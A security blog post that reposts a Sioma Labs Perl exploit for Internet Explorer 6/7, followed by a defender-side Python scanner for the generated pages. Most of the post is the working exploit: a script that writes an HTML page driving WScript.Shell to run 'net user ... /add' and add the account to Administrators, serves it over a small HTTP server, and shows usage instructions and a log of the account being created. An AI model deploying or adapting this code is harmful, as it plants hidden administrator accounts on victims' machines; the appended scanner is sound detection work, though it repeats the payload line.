Andrea Draghetti aka Drego. I analyze and counter phishing at D3Lab and I'm a team member of BackBox Linux! PhishingArmy and meioc are my projects!

Internet Explorer – Remote User Add Exploit


Exploit-db recently published an exploit affecting Internet Explorer 6 and 7 that would allow Administrator users to be added to a PC simply by browsing the web. This would let attackers access your PC through a user created ad hoc with administrative privileges and remote access.

The exploit, after the jump…

# Exploit Title: Internet Explorer ( 6/7) Remote Code Execution -Remote User Add Exploit
# Date: 15/02/2010
# Author: Sioma Labs
# Software Link: N/A
# Version: IE 7
# Tested on: Windows XP sp2
# CVE :
# Code :

#!/usr/bin/perl

use strict;
use Socket;
use IO::Socket;

print "\n";
print "800008                           8                      \n";
print "8      e  eeeee eeeeeee eeeee    8     eeeee eeeee  eeeee\n";
print "8eeeee 8  8  88 8  8  8 8   8    8e    8   8 8   8  8   | \n";
print "    88 8e 8   8 8e 8  8 8eee8    88    8eee8 8eee8e 8eeee \n";
print "e   88 88 8   8 88 8  8 88  8    88    88  8 88   8    88 \n";
print "8eee88 88 8eee8 88 8  8 88  8    88eee 88  8 88eee8 8ee88 \n";
print "-----------------------------------------------------------\n";
print " Useage : $0 Port \n";
print " Please Read the Instruction befor you use this \n";
print " ---------------------------------\n";

sub parse_form {
    my $data = $_[0];
    my %data;
    foreach (split /&/, $data) {
        my ($key, $val) = split /=/;
        $val =~ s/\+/ /g;
        $val =~ s/%(..)/chr(hex($1))/eg;
        $data{$key} = $val;
    }
    return %data;
}

my $port = shift;
defined($port) or die "Usage: $0 Port \n";
mkdir("public_html", 0777) || print $!;
my $DOCUMENT_ROOT = $ENV{'HOME'} . "/public_html";

print " [+] Account Name : ";     chomp(my $acc  = <STDIN>);
print " [+] Account Password : "; chomp(my $pass = <STDIN>);
print " [+] Your IP : ";          chomp(my $ip   = <STDIN>);

#------------- Exploit -----------------
my $iexplt = "public_html/index.html";
open (myfile, ">>$iexplt");
print myfile "<html>\n";
print myfile "<title> IE User Add Test </title>\n";
print myfile "<head>";
print myfile "</font></b></p>\n";
print myfile "<p>\n";
print myfile "<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='exploit'\n";
print myfile "></object>\n";
print myfile "<script language='vbscript'>\n";
print myfile "adduser=";
print myfile '"cmd';
print myfile " /c net user $acc $pass /add && net localgroup Administrators $acc ";
print myfile '/add"';
print myfile "\n";
print myfile "exploit.run adduser \n";
print myfile "\n </script></p>\n";
print " [+] ----------------------------------------\n";
print " [-] Link Genetrated : http://$ip:$port/index.html\n";
close (myfile);
#------------------------------------

my $server = new IO::Socket::INET(Proto     => 'tcp',
                                  LocalPort => $port,
                                  Listen    => SOMAXCONN,
                                  Reuse     => 1);
$server or die "Unable to create server socket: $!";

while (my $client = $server->accept()) {
    $client->autoflush(1);
    my %request = ();
    my %data;

    {
        local $/ = Socket::CRLF;
        while (<$client>) {
            chomp;
            if (/\s*(\w+)\s*([^\s]+)\s*HTTP\/(\d.\d)/) {
                $request{METHOD}       = uc $1;
                $request{URL}          = $2;
                $request{HTTP_VERSION} = $3;
            }
            elsif (/:/) {
                (my $type, my $val) = split /:/, $_, 2;
                $type =~ s/^\s+//;
                foreach ($type, $val) {
                    s/^\s+//;
                    s/\s+$//;
                }
                $request{lc $type} = $val;
            }
            elsif (/^$/) {
                read($client, $request{CONTENT}, $request{'content-length'})
                    if defined $request{'content-length'};
                last;
            }
        }
    }

    if ($request{METHOD} eq 'GET') {
        if ($request{URL} =~ /(.*)\?(.*)/) {
            $request{URL}     = $1;
            $request{CONTENT} = $2;
            %data = parse_form($request{CONTENT});
        } else {
            %data = ();
        }
        $data{"_method"} = "GET";
    } elsif ($request{METHOD} eq 'POST') {
        %data = parse_form($request{CONTENT});
        $data{"_method"} = "POST";
    } else {
        $data{"_method"} = "ERROR";
    }

    my $localfile = $DOCUMENT_ROOT . $request{URL};

    if (open(FILE, "<$localfile")) {
        print $client "HTTP/1.0 200 OK", Socket::CRLF;
        print $client "Content-type: text/html", Socket::CRLF;
        print $client Socket::CRLF;
        my $buffer;
        while (read(FILE, $buffer, 4096)) {
            print $client $buffer;
        }
        $data{"_status"} = "200";
    }
    else {
        print $client "HTTP/1.0 404 Not Found", Socket::CRLF;
        print $client Socket::CRLF;
        print $client "<html><body>404 Not Found</body></html>";
        $data{"_status"} = "404";
    }
    close(FILE);

    print ($DOCUMENT_ROOT.$request{URL}, "\n");
    foreach (keys(%data)) {
        print ("   $_ = $data{$_}\n");
    }

    close $client;
    # Sioma Labs
    # http://siomalabs.com
    # Sioma Agent 154
}
#Instructions
#-----------
#
# This has been tested on a Windows environment (Vista), and the victim OS was Windows XP SP2 (Internet Explorer 7).
# To use this on a remote PC the generated link should be on the victim's trusted site list (Tools > Internet Options > Security > Trusted Sites > Sites).
# No requirement to run it locally: just open the exploit (public_html/index.html) with IE.
# Test Run (Used OS: Vista) / (Victim OS: XP SP2)
# -------------------------------------------------------------
#
# Attacker
# =============
#
#
# E:\>ie.pl 123
#
#800008                           8
#8      e  eeeee eeeeeee eeeee    8     eeeee eeeee  eeeee
#8eeeee 8  8  88 8  8  8 8   8    8e    8   8 8   8  8   |
#    88 8e 8   8 8e 8  8 8eee8    88    8eee8 8eee8e 8eeee
#e   88 88 8   8 88 8  8 88  8    88    88  8 88   8    88
#8eee88 88 8eee8 88 8  8 88  8    88eee 88  8 88eee8 8ee88
#-----------------------------------------------------------
# Useage : E:\ie.pl Port
# Please Read the Instruction befor you use this \n";
# ---------------------------------
#[+] Account Name : test
# [+] Account Password : test
# [+] Your IP : 192.168.1.102
# [+] ----------------------------------------
# [-] Link Genetrated : http://192.168.1.102:123/index.html
#
#------------------------------------------------------------>
# Not Tested on Linux ( Should Work on it too) #
#
# Victim
#========
# Befor -
# C:\>net user
#
#User accounts for \\PC-00583E3C730C
#
#-------------------------------------------------------------------------------
#Administrator            SiomaPC                Guest
#HelpAssistant            SUPPORT_388945a0
#The command completed successfully.
#
# After -
#C:\>net user
#
#User accounts for \\PC-00583E3C730C
#
#-------------------------------------------------------------------------------
#Administrator            SiomaPC                Guest
#HelpAssistant            SUPPORT_388945a0        test
#The command completed successfully.
#
#C:\>
# ============================================================================
# The "test" user has been created successfully
#
# Delete The "Public_Html\index.html" If you use this for the 2nd time
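A defender-side check, added here and not part of the original post or of the Sioma Labs code: a small Python scanner that flags saved HTML pages built the way the generator above builds index.html. It relies on the classid in that page being the CLSID of the Windows Script Host Shell object (WScript.Shell), so the page is scripting a shell object rather than exploiting a memory bug; the sample markup is constructed from the generator's output for account test/test.

```python
import re
from html.parser import HTMLParser

# CLSID of the Windows Script Host Shell object (WScript.Shell), which the
# generated index.html instantiates via <object> and then drives with .run.
WSCRIPT_SHELL_CLSID = "72C24DD5-D70A-438B-8A42-98424B88AFB8"
def normalize_clsid(value):
    """'clsid:{72c24dd5-...}' or 'CLSID:72C24DD5-...' -> bare uppercase GUID."""
    v = value.strip().lower()
    return (v[6:] if v.startswith("clsid:") else v).strip("{}").upper()
class ObjectScriptParser(HTMLParser):
    def __init__(self):
        super().__init__()
        # id -> CLSID, list of (language, text), script currently being collected
        self.objects, self.scripts, self._script = {}, [], None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "object":
            self.objects[a.get("id", "")] = normalize_clsid(a.get("classid", ""))
        elif tag == "script":  # note the language attribute, start collecting text
            self._script = ((a.get("language") or a.get("type") or "").lower(), [])
    def handle_data(self, data):
        if self._script is not None:
            self._script[1].append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            self.scripts.append((self._script[0], "".join(self._script[1])))
            self._script = None

def scan_html(html):
    """Return the findings for one page; an empty list means nothing matched."""
    p = ObjectScriptParser()
    p.feed(html); p.close()
    findings = []
    for obj_id, clsid in p.objects.items():
        if clsid != WSCRIPT_SHELL_CLSID:
            continue
        findings.append(f"<object id={obj_id!r}> instantiates WScript.Shell")
        for lang, body in p.scripts:  # is that object actually driven from script?
            if obj_id and re.search(rf"\b{re.escape(obj_id)}\.run\b", body, re.I):
                findings.append(f"{lang or 'script'} block calls {obj_id}.run")
    for _, body in p.scripts:  # the specific payload this generator emits
        if re.search(r"\bnet\s+user\b.*?/add", body, re.I):
            findings.append("script body contains 'net user ... /add'")
    return findings

# Constructed sample: the markup the Perl generator above writes for account test/test.
SAMPLE_PAGE = """<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='exploit'></object>
<script language='vbscript'>
adduser="cmd /c net user test test /add && net localgroup Administrators test /add"
exploit.run adduser
</script>"""
```

Pages that instantiate the object but never call `.run` still produce the first finding, so the result list, not just its emptiness, is what to log.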
